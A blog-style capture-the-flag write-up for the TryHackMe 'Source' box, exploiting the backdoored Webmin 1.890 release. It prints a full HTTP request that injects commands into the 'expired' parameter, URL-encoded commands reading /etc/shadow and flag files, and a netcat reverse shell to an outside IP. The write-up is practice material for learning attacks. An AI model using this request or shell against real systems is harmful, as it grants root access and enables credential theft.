---
layout: post
title:  "THM - Source"
date:   2020-07-10 18:00:00 +1000
category: hacking
---

## Introduction
*Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool.*  

So we've got a pretty big hint already. This box is rated Easy.

## Ports
nmap says we've got 22 (SSH) and 10000 only; Webmin typically runs on port 10000. Lets get some more details though.

## Port Scan Details
>PORT      STATE SERVICE REASON         VERSION  
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)  
10000/tcp open  http    syn-ack ttl 63 MiniServ 1.890 (Webmin httpd)  

So we do have Webmin, and it's version 1.890.

## What's the vulnerability?
It's explained [here](http://www.webmin.com/exploit.html), but in short someone exploited the Webmin development build server and deliberately added a vulnerability to it. 

*Webmin version 1.890 was released with a backdoor that could allow anyone with knowledge of it to execute commands as root. Versions 1.900 to 1.920 also contained a backdoor using similar code, but it was not exploitable in a default Webmin install.*

## Searchsploit
Running searchsploit shows several exploits for Webmin 1.920, so let's fire up Metasploit and see if the server is vulnerable.

## Metasploit
The relevant module wasn't installed in my version of metasploit, so I had to add it, which I always forget how to do. But it's basically copy the module and reload the modules:

1. cp /usr/share/exploitdb/exploits/linux/remote/47230.rb /root/.msf4/modules/exploits/linux/remote/47230.rb  
2. reload_all

And after that it turns out the server wasn't vulnerable :/. So presumably it's the specific 1.89 version **only**.

## 1.89 Vuln
As it turns out it's super easy; the Burp Suite repeater payload looks like this:

>POST /password_change.cgi HTTP/1.1   
Host: 10.10.5.148:10000  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://10.10.5.148:10000/  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 14  
Connection: close  
Cookie: redirect=1; testing=1  
Upgrade-Insecure-Requests: 1  
-----blank line-----  
expired=**whoami**

See the highlighted part above? That's remote code execution, as root. Wew lad.

Some possible commands:

``
cat+/etc/shadow  
``

``
cat+/etc/passwd  
``

``
cat+/home/dark/user.txt  
``

``
cat+/root/root.txt  
``

``
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f
``

That last one is the only one you actually need - a reverse shell as root, thanks for playing.
